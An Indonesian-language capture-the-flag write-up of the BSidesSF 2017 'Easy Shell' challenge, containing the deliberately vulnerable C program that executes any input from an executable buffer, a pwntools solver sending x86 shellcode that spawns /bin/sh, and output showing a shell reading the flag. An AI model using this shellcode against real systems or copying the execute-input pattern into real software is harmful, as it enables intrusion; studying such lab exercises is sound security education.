BSide 2017 - Easy Shell

Masalah

Diberikan source code easyshell.c.

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

#define LENGTH 1024
#define disable_buffering(_fd) setvbuf(_fd, NULL, _IONBF, 0)

int main(int argc, char *argv[])
{
  uint8_t *buffer = mmap(NULL, LENGTH, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
  ssize_t len;

  alarm(10);

  disable_buffering(stdout);
  disable_buffering(stderr);

  printf("Send me stuff!!\n");
  len = read(0, buffer, LENGTH);

  if(len < 0) {
    printf("Error reading!\n");
    exit(1);
  }

  asm("call *%0\n" : :"r"(buffer));

  return 0;
}

Kompilasi dengan perintah:

CC?=gcc
OBJS=easyshell.o

easyshell: ${OBJS}
    ${CC} -m32 ${CFLAGS} -o easyshell easyshell.c

clean:
    rm -fv *.o easyshell core core.*

Narasi:

The server will run any code you send it. Easy peaasy!

The flag is in /home/ctf/flag.txt

nc easyshell-f7113918.ctf.bsidessf.net 5252

Penyelesaian

Alur program hanya menerima input kemudian langsung mengeksekusi saja. Untuk mengeksploitasinya, kirimkan shellcode saja.

Script solver.py:

from pwn import *

shellcode = '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\x50\x68\x2f\x2f\
x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'
# Remote
# x = remote('easyshell-f7113918.ctf.bsidessf.net',5252)
# Local
x = process('easyshell')
x.recvline()
x.sendline(shellcode)
x.interactive()

Output yang dihasilkan antara lain:

[+] Opening connection to easyshell-f7113918.ctf.bsidessf.net on port 5252: Do
ne
[*] Switching to interactive mode
$ ls
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat /home/ctf/flag.txt
FLAG:c832b461f8772b49f45e6c3906645adb
[*] Got EOF while reading in interactive